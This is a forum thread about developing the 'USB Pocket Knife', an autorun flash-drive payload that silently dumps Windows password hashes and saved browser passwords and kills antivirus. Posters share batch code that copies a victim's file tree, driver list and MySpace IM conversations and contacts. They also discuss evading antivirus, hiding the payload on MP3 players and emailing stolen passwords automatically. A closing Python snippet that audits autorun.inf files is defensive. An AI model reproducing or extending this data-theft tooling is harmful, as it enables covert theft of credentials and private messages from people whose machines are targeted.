USB Pocket-Knife Development


Thanks very much for this excellent tool. I am a college teacher, and I teach Ethical Hacking classes at City College San Francisco. I have been carrying my USB PocketKnife all around campus, amazing everyone with it. I can collect password hashes from Windows XP SP3 and Windows Vista SP1 machines. Half the time I have no problem, but sometimes I see an error message saying "Exception Processing Message c0000513 Parameters..." (see attached image). If I click "Continue", it collects the password hashes OK. I have not noticed any pattern to which machines will give that error.

I just wrote a project for my Advanced Hacking students based on this tool. It's posted here: http://samsclass.info/124/124_F08.html#projects

I owe you one! If you get out to San Francisco, look me up. And if you get to DEFCON, I'll buy you a drink!

--Sam Bowne

Link to comment
Share on other sites

*That*, is the infamous "No Disk" error that we've been talking about. It seems to stem from drive letters that show up in the list of drives that aren't actually drives. (such as on a laptop that has a CF slot when there's no CF card plugged into the slot)

Leapo is presently working on a solution.

Hey Leapo!!! How's that coming??? :)

Link to comment
Share on other sites

Wow, that was a bit unexpected! Good going with the project sheet, it's one of the best guides I've ever seen for setting my payload up. :)

As for the error, would I be correct in assuming that all of the computers that exhibit the error have some kind of removable media device in them that's mounted to a drive letter higher than the flash drive and U3 partition? For example, C:\ Hard Disk, D:\ DVD-ROM, E:\ Flash Drive, F:\ U3 Partition, G:\ Empty Card Reader

If this is the case, then the new drive detection I'm working on will fix the issue. The latest version (attached at the bottom of this post) doesn't have the new detection routine yet, but the next release will have it for sure.

UPDATE: VERSION 0.8.8.0 IS OUT!

NEW FEATURES

  • Added option to shut down the PC when the payload is finished running.
  • Added the ability to keep up to 3 payload configuration profiles.
  • Added the ability to dump saved passwords from Google Chrome browser.

BUG FIX LIST

  • If "Safety.txt Check" is disabled Menu.bat will now show the "run payload" option even if Safety.txt is found.
  • Fixed some cosmetic issues in Menu.bat where some screens were a line too long.

KNOWN BUGS

  • Keylogger isn't working right.

DOWNLOAD THE USB POCKET KNIFE V0.8.8.0

Includes both U3 and Non-U3 versions. A pre-built U3 ISO is included.

Download Mirrors: MegaUpload, and RapidShare

Link to comment
Share on other sites

Just take it from gonzor vanguard. @ Leapo, I will surely test it on my machines! and post results asap

Well, I took it from Gonzor, but I did not manage to get it started. How do I have to install it on the cdrom part? I can unpack Leapo's UTCUSTOM.ISO and add the Launchpad.exe (like Gonzor did), but there must still be something changed in the scripts "GO.VBS" and/or "Autorun.inf" on the cdrom part. There is something wrong with my files "GO.VBS" or "Autorun.inf". Anyway, I still did not have any success in getting it running.

Link to comment
Share on other sites

Hey guys, this seems like a great mod and I'd love to try it out, although I can't get the ISO to write to the CD partition. I renamed it to PelicanBFG_autorun.iso and it attempts to write it but fails. I believe it is because the ISO is bigger than the partition. A point in the right direction would be great ;)

Link to comment
Share on other sites

Leapo, you've done great work! I'm speechless. Thank you very much. And thanks to everybody who's helping this development to grow.

Could you password protect the further versions for easy downloading? Thanks.

If I'm not mistaken, I can put the non-U3 payload on flash MP3 players (if the system sees them as massive data storage). What is the sneakiest way to run the Pocket Knife from an MP3 player? Any suggestions are welcome.

Link to comment
Share on other sites

Leapo, any chance of these getting into the pocket knife?

It's something I added to Gonzor's Switchblade that I like to use. Very simple, I just added...

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [C:\ Tree Listing] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
tree /F /A C:\ >> %log% 2>&1
)

I also did...

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [File Type Associations] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
assoc >> %log% 2>&1
)

and...

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Driver Info] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
driverquery >> %log% 2>&1
)

The tree listing gives you a list of all the files on the computer, very useful!

Link to comment
Share on other sites

I just tested it on my XP, works like a charm, except the dump passes don't work for me, says permission denied in log. Also, shut-down and the profile work too. However, avkill and the stop window's thing don't work, it gets detected if it's enabled.

Link to comment
Share on other sites

Read through the thread. There was a tut on how to put it back

@Jen Please don't mind me, but I found only the one written by myself. But this does not work. It would be nice if I could get some help.

@Leapo Nice thing! I tested the latest version and now it is no longer detecting the cachedump.exe at the cdrom part. Cheers!

Thanks for the profiles, too! IMO three profiles should be enough. This is exactly what I imagined.

Link to comment
Share on other sites

Leapo, any chance of these getting into the pocket knife?

It's something I added to Gonzor's Switchblade that I like to use. Very simple, I just added...

<snip>

tree /F /A C:\ >> %log% 2>&1

<snip>

assoc >> %log% 2>&1

<snip>

driverquery >> %log% 2>&1

Woops... just deleted what was here. I confused myself...

Put this:

IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1
mkdir %logdir%\Slurp_Data\
    tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1
    assoc > %logdir%\Slurp_Data\assoc.log 2>&1
    driverquery > %logdir%\Slurp_Data\driver.log 2>&1

right at the beginning of the slurp1 code block.

I think Leapo was going to put a switch in to turn that on and off.

Link to comment
Share on other sites

Leapo, not to be a bitchy nancy, but can you please add a feature that emails passwords IMMEDIATELY after the payload has finished and just before it closes the computer? The keylogger is way more complicated, so I'm quite sure you can do it, can you mate? But immediately when the payload stops, to email all the dumps (no files though).

Link to comment
Share on other sites

Leapo, I could test the new version today. As I wrote above, no more binaries are detected when the stick is disarmed. But: when the stick is armed, and the option "AVKILL" is active, then CRCSS.EXE is detected by the virus scanner. IMO the virus scanner is checking the code in the RAM before execution, and is remembering from which place it is started. Otherwise CRCSS.EXE would have been detected whenever you put the stick in. But this is definitely not the case!

If the stick is armed, and the option "AVKILL" is NOT armed, the virus scanner does not see the binary.

Hope this helps.

Link to comment
Share on other sites

Wow! That is a nicely crafted batch file. Good work!

I added this to the initial :slurp. Pulls contact lists, logs, saved convos and offline messages for Myspace IM. Have a few other ideas I will implement on my own drive when I get time. Maybe I'll come back and post them.

:: Myspace IM
mkdir %logdir%\Slurp_Data\Myspace
fc.exe "%APPDATA%\Myspace\IM\Conversations\*" "%logdir%\Slurp_Data\Myspace\*" /i /o    
xcopy "%APPDATA%\MySpace\IM\Logs\*.log" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
xcopy "%APPDATA%\MySpace\IM\ContactCache\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
xcopy "%APPDATA%\MySpace\IM\Download\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y

Link to comment
Share on other sites

Nice, Abi,

the problem is, I had trouble once and had to abandon my chip. It would also help if it emailed it to me right before it shuts down.

Abi, that's some really nice work.

I think the slurp should have options on what to slurp... that would be nice.

EDIT: I saw the email options, but that's for the keylogger, right? I can't risk installing a keylogger, I want it to be clean when I leave it. Keylogging and malware is nasty business, I don't want to get into that.

Link to comment
Share on other sites

Hey all,

I'm having trouble enabling any of the features on the current non-U3 payload.

I can use the numbers to surf through the menu, but when I try to enable any of the features it states that it can't find the specified file and they remain disabled.

Can anyone point me in the right direction as to why this isn't working?

EDIT --- found out it was the location on my flashdrive

Link to comment
Share on other sites

Hey guys,

Just installed this and I was wondering if there is any way to keep the U3 Loader so I can keep it as a U3 drive with apps and just enable/disable the payload when necessary.

I was thinking it would be easiest to do this with a start.bat calling the programs including "wscript SYSTEM\go.vbs". The only problem I am having is running the U3 launcher: when pointing to the .exe it just opens up a random folder on my hard drive.

Do I need to get it to copy the files over like in the original autorun? (below)

open=LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad

[Definitions]
Launchpad=LaunchPad.exe
Vtype=2

[CopyFiles]
FileNumber=1
File1=LaunchPad.zip

[Update]
URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG


[Comment]
brand=PelicanBFG

Also, how do I make it so the start.bat runs silently without popping up for a second or two?

Thanks,

ike,

Link to comment
Share on other sites
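
An added example, not part of the thread or of the tool: one way to audit a removable drive's autorun.inf, like the stock U3 file quoted in the post above, for entries that make Windows run a command. The `[autorun]` header, the `MODIFIED` sample and all function names are assumptions constructed for illustration.

```python
import re

# Keys in the [autorun] section whose value is a command Windows will run.
EXEC_KEYS = {"open", "shellexecute"}
SHELL_CMD = re.compile(r"^shell\\[^\\]+\\command$")  # shell\<verb>\command
SCRIPT_MARKERS = ("wscript", "cscript", "cmd.exe", ".bat", ".cmd", ".vbs", ".js")

def parse_inf(text):
    """Parse INI-style text into {section: {key: value}}, names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

def audit_autorun(text):
    """Return sorted (severity, key, value) for each command-running entry."""
    findings = []
    for key, value in parse_inf(text).get("autorun", {}).items():
        if key in EXEC_KEYS or SHELL_CMD.match(key):
            scripted = any(m in value.lower() for m in SCRIPT_MARKERS)
            findings.append(("high" if scripted else "review", key, value))
    return sorted(findings)

# Constructed samples. The [autorun] header is assumed; the file quoted
# in the post starts at its open= line.
STOCK = """[autorun]
open=LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad
[Definitions]
Launchpad=LaunchPad.exe
"""
MODIFIED = """[AutoRun]
open=start.bat
"""

if __name__ == "__main__":
    for name, body in (("stock", STOCK), ("modified", MODIFIED)):
        print(name, audit_autorun(body))
```

A "review" finding means the drive launches a program on insert or from the shell menu; "high" means the launched command is a script or script host, which the stock U3 file does not use.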
